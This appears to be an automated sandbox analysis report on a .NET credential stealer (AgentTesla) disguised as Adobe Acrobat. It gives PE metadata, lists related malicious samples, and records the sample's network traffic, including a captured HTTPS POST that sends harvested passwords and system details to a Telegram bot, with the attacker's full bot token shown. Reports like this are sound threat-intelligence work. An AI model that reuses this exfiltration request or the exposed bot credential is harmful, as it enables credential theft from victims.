CWu89IbJQw.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
DayVXJx1km.exe | malicious | GuLoader, Snake Keylogger
NDCNDvC27F.exe | malicious | GuLoader, Snake Keylogger
3c638k0NJx.exe | malicious | Snake Keylogger, VIP Keylogger
drRbNknjyb.exe | malicious | Snake Keylogger, VIP Keylogger
3GrfjMY0pG.exe | malicious | Snake Keylogger, VIP Keylogger

Match: 104.26.13.205
get_txt.ps1 | malicious | LummaC Stealer | api.ipify.org/
XkgoE6Yb52.ps1 | malicious | Unknown | api.ipify.org/
R1TftmQpuQ.bat | malicious | Targeted Ransomware | api.ipify.org/
SpacesVoid Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/
Yoranis Setup.exe | malicious | Unknown | api.ipify.org/
BiXS3FRoLe.exe | malicious | TrojanRansom | api.ipify.org/
lEUy79aLAW.exe | malicious | TrojanRansom | api.ipify.org/
Simple1.exe | malicious | Unknown | api.ipify.org/
2b7cu0KwZl.exe | malicious | Unknown | api.ipify.org/
file.exe | malicious | Unknown | api.ipify.org/

Joe Sandbox context, by domain (Match: Associated Sample Name / URL | Detection | Threat Name | Context):

Match: api.ipify.org
kbdXtadZsM.exe | malicious | AgentTesla | 104.26.12.205
NBdxPYAgZf.exe | malicious | AgentTesla | 172.67.74.152
tmezkNPazz.exe | malicious | NetSupport RAT | 104.26.12.205
Launcher.exe | malicious | Growtopia, Phoenix Stealer | 104.26.13.205
Launcher.exe | malicious | Growtopia | 104.26.13.205
Launcher.exe | malicious | Growtopia, Phoenix Stealer | 104.26.12.205
5aQpYG37db.exe | malicious | AgentTesla | 104.26.12.205
fls3eql72b.exe | malicious | AgentTesla | 172.67.74.152
yM5WEfAX4h.exe | malicious | Unknown | 172.67.74.152
SecuriteInfo.com.Win64.Malware-gen.32406.15459.exe | malicious | Unknown | 104.26.13.205

Match: api.telegram.org
cqWZtEH4eJ.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
axN56TZ3PI.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
bvhauD4o49.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
0CBJ3aLKx0.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
CWu89IbJQw.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
DayVXJx1km.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
NDCNDvC27F.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
3c638k0NJx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
drRbNknjyb.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3GrfjMY0pG.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Associated Sample Name / URL | Detection | Threat Name | Context
Match: TELEGRAMRU
cqWZtEH4eJ.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
axN56TZ3PI.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
bvhauD4o49.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
0CBJ3aLKx0.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
CWu89IbJQw.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
DayVXJx1km.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
NDCNDvC27F.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
3c638k0NJx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
KMSpico.exe | malicious | LummaC Stealer | 149.154.167.99
drRbNknjyb.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match: CLOUDFLARENETUS
jki-dragon-release-online-setup.exe | malicious | Unknown | 104.17.118.104
1258ad6Jpw.exe | malicious | GuLoader | 104.21.16.1
kbdXtadZsM.exe | malicious | AgentTesla | 104.26.12.205
NBdxPYAgZf.exe | malicious | AgentTesla | 172.67.74.152
iFoDComHqT.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.112.1
yXsTZ347KJ.exe | malicious | Unknown | 162.159.130.233
https://www.dottedsign.com/task?code=eyJhbGciOiJIUzUxMiJ9.eyJ0YXNrX2lkIjozNDU1ODM1LCJmaWxlX2lkIjoyMjU3NDQ4Mywic2lnbl9maWxlX2lkIjoyMzE3NTY1OCwic3RhZ2VfaWQiOjQ3MjQ2MTcsImVtYWlsIjoidmZhcmlhc0B3ZXN0bGFrZS5jb20iLCJleHBpcmVkX2F0IjoxNzQxNTUzNDgzfQ.HzZLgMMxAZSV_iVgO--XdcSNVOvVCdiCg8S3aUWMChplsdtgyqOWKyJi3vwVbeBh99sm9EHWsNwj41IZdYNjWA | malicious | Unknown | 172.65.198.159
cqWZtEH4eJ.exe | malicious | GuLoader, Snake Keylogger | 104.21.16.1
g1V10ssekg.exe | malicious | FormBook | 188.114.96.3
axN56TZ3PI.exe | malicious | GuLoader, Snake Keylogger | 104.21.64.1
Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
kbdXtadZsM.exe | malicious | AgentTesla | 149.154.167.220, 104.26.13.205
NBdxPYAgZf.exe | malicious | AgentTesla | 149.154.167.220, 104.26.13.205
yXsTZ347KJ.exe | malicious | Unknown | 149.154.167.220, 104.26.13.205
cqWZtEH4eJ.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220, 104.26.13.205
axN56TZ3PI.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220, 104.26.13.205
yXsTZ347KJ.exe | malicious | Unknown | 149.154.167.220, 104.26.13.205
bvhauD4o49.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220, 104.26.13.205
0CBJ3aLKx0.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220, 104.26.13.205
CWu89IbJQw.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220, 104.26.13.205
Jynj1RQC49.exe | malicious | Unknown | 149.154.167.220, 104.26.13.205
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.258567653551615
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: xnlP06YunJ.exe
File size: 1'971'616 bytes
MD5: a76f2b7c0390e364909268037328a880
SHA1: 2177eb596046f6f3a0fd743cad0a438c990fdde4
SHA256: 3301c867bfc564fad83be393a67e00cf4615b436940db9ed0728b3d4a523e040
SHA512: 27ee519113d2f4802f24e052ea417ea1c1b78ed301aaa1326666626d5d7ec6099ea3f378ce384783133eb5cd67fceef8a35bbf37112bbbbb8a961598017e82f6
SSDEEP: 24576:SUmGUfci/Tao+BWXxKhBpIildTdqsHs2TpwB2XPMPYMG8FoSpm7He58ynvdq2DI2:obKCEdqsdmg8Y6oS6Wpv4z
TLSH: 3195CE023686CF60D19F1776C4A644F41363FE41ED4ED7EB298A7FEA387236669401A3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................:...........Y... ...`....@.. .......................@............`................................
Icon Hash: 2d525272484c550b
Entrypoint: 0x58590e
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67ABC0FB [Tue Feb 11 21:28:27 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Signature Valid: false
Signature Issuer: CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After
• 03/11/2023 01:00:00 05/11/2025 00:59:59
Subject Chain
• CN=Adobe Inc., OU=Acrobat DC, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
Version: 3
Thumbprint MD5: 464C015DAA50884AB4DD5502E6B164B0
Thumbprint SHA-1: 96B7B1EF175BBA4BDE33A05402134289B28B5BCB
Thumbprint SHA-256: ABC429325881B54BEC561B7B5A635E0E0AC9C94742F1324EBE5EB9AF6AE0CCC5
Serial: 0D1A340F78D7D000E089FDBAAD6522DF
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the line above is repeated 97 times in the report: the bytes following the jmp are all zero, and 00 00 disassembles as add byte ptr [eax], al)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1858c0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x186000 | 0x5adc0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1dec00 | 0x29a0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1e2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x183914 | 0x183a00 | 88849082b3e68b4fd3803845b13b4c0e | False | 0.8840350139068043 | SysEx File - | 7.806883109554231 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x186000 | 0x5adc0 | 0x5ae00 | 752d1590fcaf03653716eabaabef6b72 | False | 0.03483117692572214 | data | 2.404004697205331 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1e2000 | 0xc | 0x200 | cee508dd897c8e100543fa9608261735 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x186220 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 11811 x 11811 px/m | | | 0.022916235168801966
RT_ICON | 0x1c8248 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 11811 x 11811 px/m | | | 0.04400804448124926
RT_ICON | 0x1d8a70 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 11811 x 11811 px/m | | | 0.07853094000944733
RT_ICON | 0x1dcc98 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 11811 x 11811 px/m | | | 0.10020746887966805
RT_ICON | 0x1df240 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 11811 x 11811 px/m | | | 0.14329268292682926
RT_ICON | 0x1e02e8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 11811 x 11811 px/m | | | 0.20035460992907803
RT_GROUP_ICON | 0x1e0750 | 0x5a | data | | | 0.7666666666666667
RT_VERSION | 0x1e07ac | 0x426 | data | | | 0.4105461393596987
RT_MANIFEST | 0x1e0bd4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
Comments | Adobe Acrobat
CompanyName | Adobe Systems Incorporated
FileDescription | Adobe Acrobat
FileVersion | 24.5.20320.0
InternalName | Kqjoqlc.exe
LegalCopyright | Copyright 1984-2024 Adobe Systems Incorporated and its licensors. All rights reserved.
LegalTrademarks |
OriginalFilename | Kqjoqlc.exe
ProductName | Adobe Acrobat
ProductVersion | 24.5.20320.0
Assembly Version | 24.5.20320.0
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-07T22:51:09.625936+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.7 | 49683 | 149.154.167.220 | 443 | TCP
2025-03-07T22:51:10.368588+0100 | 2851779 | ETPRO MALWARE Agent Tesla Telegram Exfil | 1 | 192.168.2.7 | 49683 | 149.154.167.220 | 443 | TCP
2025-03-07T22:51:10.368588+0100 | 2852815 | ETPRO MALWARE Agent Tesla Telegram Exfil M2 | 1 | 192.168.2.7 | 49683 | 149.154.167.220 | 443 | TCP
2025-03-07T22:51:11.108511+0100 | 2854281 | ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound | 1 | 149.154.167.220 | 443 | 192.168.2.7 | 49683 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 7, 2025 22:51:02.152507067 CET | 49682 | 443 | 192.168.2.7 | 104.26.13.205
Mar 7, 2025 22:51:02.152561903 CET | 443 | 49682 | 104.26.13.205 | 192.168.2.7
Mar 7, 2025 22:51:02.152645111 CET | 49682 | 443 | 192.168.2.7 | 104.26.13.205
Mar 7, 2025 22:51:02.179785967 CET | 49682 | 443 | 192.168.2.7 | 104.26.13.205
Mar 7, 2025 22:51:02.179841042 CET | 443 | 49682 | 104.26.13.205 | 192.168.2.7
Mar 7, 2025 22:51:04.189089060 CET | 443 | 49682 | 104.26.13.205 | 192.168.2.7
Mar 7, 2025 22:51:04.189168930 CET | 49682 | 443 | 192.168.2.7 | 104.26.13.205
Mar 7, 2025 22:51:04.197195053 CET | 49682 | 443 | 192.168.2.7 | 104.26.13.205
Mar 7, 2025 22:51:04.197232962 CET | 443 | 49682 | 104.26.13.205 | 192.168.2.7
Mar 7, 2025 22:51:04.197573900 CET | 443 | 49682 | 104.26.13.205 | 192.168.2.7
Mar 7, 2025 22:51:04.250360012 CET | 49682 | 443 | 192.168.2.7 | 104.26.13.205
Mar 7, 2025 22:51:04.311014891 CET | 49682 | 443 | 192.168.2.7 | 104.26.13.205
Mar 7, 2025 22:51:04.352375984 CET | 443 | 49682 | 104.26.13.205 | 192.168.2.7
Mar 7, 2025 22:51:05.071261883 CET | 443 | 49682 | 104.26.13.205 | 192.168.2.7
Mar 7, 2025 22:51:05.117237091 CET | 443 | 49682 | 104.26.13.205 | 192.168.2.7
Mar 7, 2025 22:51:05.120470047 CET | 49682 | 443 | 192.168.2.7 | 104.26.13.205
Mar 7, 2025 22:51:05.130430937 CET | 49682 | 443 | 192.168.2.7 | 104.26.13.205
Mar 7, 2025 22:51:06.623522043 CET | 49683 | 443 | 192.168.2.7 | 149.154.167.220
Mar 7, 2025 22:51:06.623560905 CET | 443 | 49683 | 149.154.167.220 | 192.168.2.7
Mar 7, 2025 22:51:06.623636007 CET | 49683 | 443 | 192.168.2.7 | 149.154.167.220
Mar 7, 2025 22:51:06.625297070 CET | 49683 | 443 | 192.168.2.7 | 149.154.167.220
Mar 7, 2025 22:51:06.625314951 CET | 443 | 49683 | 149.154.167.220 | 192.168.2.7
Mar 7, 2025 22:51:09.253770113 CET | 443 | 49683 | 149.154.167.220 | 192.168.2.7
Mar 7, 2025 22:51:09.253849983 CET | 49683 | 443 | 192.168.2.7 | 149.154.167.220
Mar 7, 2025 22:51:09.266530991 CET | 49683 | 443 | 192.168.2.7 | 149.154.167.220
Mar 7, 2025 22:51:09.266552925 CET | 443 | 49683 | 149.154.167.220 | 192.168.2.7
Mar 7, 2025 22:51:09.267010927 CET | 443 | 49683 | 149.154.167.220 | 192.168.2.7
Mar 7, 2025 22:51:09.268867016 CET | 49683 | 443 | 192.168.2.7 | 149.154.167.220
Mar 7, 2025 22:51:09.316337109 CET | 443 | 49683 | 149.154.167.220 | 192.168.2.7
Mar 7, 2025 22:51:09.625754118 CET | 49683 | 443 | 192.168.2.7 | 149.154.167.220
Mar 7, 2025 22:51:09.625785112 CET | 443 | 49683 | 149.154.167.220 | 192.168.2.7
Mar 7, 2025 22:51:10.368644953 CET | 443 | 49683 | 149.154.167.220 | 192.168.2.7
Mar 7, 2025 22:51:10.422244072 CET | 49683 | 443 | 192.168.2.7 | 149.154.167.220
Mar 7, 2025 22:51:11.107702017 CET | 443 | 49683 | 149.154.167.220 | 192.168.2.7
Mar 7, 2025 22:51:11.108232975 CET | 49683 | 443 | 192.168.2.7 | 149.154.167.220
Mar 7, 2025 22:51:11.108283997 CET | 443 | 49683 | 149.154.167.220 | 192.168.2.7
Mar 7, 2025 22:51:11.108340025 CET | 49683 | 443 | 192.168.2.7 | 149.154.167.220
Mar 7, 2025 22:52:40.085621119 CET | 49691 | 443 | 192.168.2.7 | 149.154.167.220
Mar 7, 2025 22:52:40.085676908 CET | 443 | 49691 | 149.154.167.220 | 192.168.2.7
Mar 7, 2025 22:52:40.085920095 CET | 49691 | 443 | 192.168.2.7 | 149.154.167.220
Mar 7, 2025 22:52:40.086226940 CET | 49691 | 443 | 192.168.2.7 | 149.154.167.220
Mar 7, 2025 22:52:40.086246014 CET | 443 | 49691 | 149.154.167.220 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 7, 2025 22:51:02.138669968 CET | 55849 | 53 | 192.168.2.7 | 1.1.1.1
Mar 7, 2025 22:51:02.145934105 CET | 53 | 55849 | 1.1.1.1 | 192.168.2.7
Mar 7, 2025 22:51:06.615628004 CET | 55834 | 53 | 192.168.2.7 | 1.1.1.1
Mar 7, 2025 22:51:06.622925043 CET | 53 | 55834 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 7, 2025 22:51:02.138669968 CET | 192.168.2.7 | 1.1.1.1 | 0xfdf2 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 7, 2025 22:51:06.615628004 CET | 192.168.2.7 | 1.1.1.1 | 0x3594 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 7, 2025 22:51:02.145934105 CET | 1.1.1.1 | 192.168.2.7 | 0xfdf2 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 22:51:02.145934105 CET | 1.1.1.1 | 192.168.2.7 | 0xfdf2 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 22:51:02.145934105 CET | 1.1.1.1 | 192.168.2.7 | 0xfdf2 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 22:51:06.622925043 CET | 1.1.1.1 | 192.168.2.7 | 0x3594 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                              • api.ipify.org
                                                                              • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49682 | 104.26.13.205 | 443 | 524 | C:\Users\user\Desktop\xnlP06YunJ.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-07 21:51:04 UTC | 155 | OUT | GET / HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                              Host: api.ipify.org
                                                                              Connection: Keep-Alive
2025-03-07 21:51:05 UTC | 426 | IN | HTTP/1.1 200 OK
                                                                              Date: Fri, 07 Mar 2025 21:51:04 GMT
                                                                              Content-Type: text/plain
                                                                              Content-Length: 12
                                                                              Connection: close
                                                                              Vary: Origin
                                                                              cf-cache-status: DYNAMIC
                                                                              Server: cloudflare
                                                                              CF-RAY: 91cd4fe53a9382e7-IAD
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=73040&min_rtt=52449&rtt_var=33195&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=55080&cwnd=175&unsent_bytes=0&cid=5eebf2ee87cd5bb7&ts=736&x=0"
2025-03-07 21:51:05 UTC | 12 | IN | Data Raw: 37 31 2e 32 32 30 2e 31 35 2e 36 30
                                                                              Data Ascii: 71.220.15.60


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49683 | 149.154.167.220 | 443 | 524 | C:\Users\user\Desktop\xnlP06YunJ.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-07 21:51:09 UTC | 260 | OUT | POST /bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendDocument HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=---------------------------8dd5d984054af83
                                                                              Host: api.telegram.org
                                                                              Content-Length: 980
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
2025-03-07 21:51:09 UTC | 980 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 64 39 38 34 30 35 34 61 66 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 33 30 39 34 34 38 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 64 39 38 34 30 35 34 61 66 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 30 37 2f 32 30 32 35 20 31 36 3a 35 31 3a 30 35 0a 55 73 65 72
                                                                              Data Ascii: -----------------------------8dd5d984054af83Content-Disposition: form-data; name="chat_id"7103094488-----------------------------8dd5d984054af83Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/07/2025 16:51:05User
2025-03-07 21:51:10 UTC | 25 | IN | HTTP/1.1 100 Continue
2025-03-07 21:51:11 UTC | 1207 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0
                                                                              Date: Fri, 07 Mar 2025 21:51:10 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 819
                                                                              Connection: close
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                              {"ok":true,"result":{"message_id":9833,"from":{"id":7351654760,"is_bot":true,"first_name":"\u0422\u043e\u0442 \u0441\u0430\u043c\u044b\u0439 \u0431\u043e\u0442","username":"KolabinBot"},"chat":{"id":7103094488,"first_name":"Garett","last_name":"Taller","username":"garetttaller","type":"private"},"date":1741384270,"document":{"file_name":"user-609290 2025-03-07 16-51-05.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAImaWfLak6z4DnlSOvi1g5l77xfMyhzAAIYBQACBEFhRvqpk1mkptksNgQ","file_unique_id":"AgADGAUAAgRBYUY","file_size":351},"caption":"New PW Recovered!\n\nTime: 03/07/2025 16:51:05\nUser Name: user/609290\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 71.220.15.60","caption_entities":[{"offset":182,"length":12,"type":"url"}]}}



                                                                              Target ID:0
                                                                              Start time:16:50:32
                                                                              Start date:07/03/2025
                                                                              Path:C:\Users\user\Desktop\xnlP06YunJ.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\xnlP06YunJ.exe"
                                                                              Imagebase:0xdd0000
                                                                              File size:1'971'616 bytes
                                                                              MD5 hash:A76F2B7C0390E364909268037328A880
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1158237609.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:16:50:33
                                                                              Start date:07/03/2025
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                                              Imagebase:0x460000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:16:50:33
                                                                              Start date:07/03/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff642da0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:16:50:33
                                                                              Start date:07/03/2025
                                                                              Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:ipconfig /release
                                                                              Imagebase:0xc00000
                                                                              File size:29'184 bytes
                                                                              MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:16:51:00
                                                                              Start date:07/03/2025
                                                                              Path:C:\Users\user\Desktop\xnlP06YunJ.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\xnlP06YunJ.exe"
                                                                              Imagebase:0x2d0000
                                                                              File size:1'971'616 bytes
                                                                              MD5 hash:A76F2B7C0390E364909268037328A880
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2109400212.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2109400212.0000000002887000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2109400212.0000000002887000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
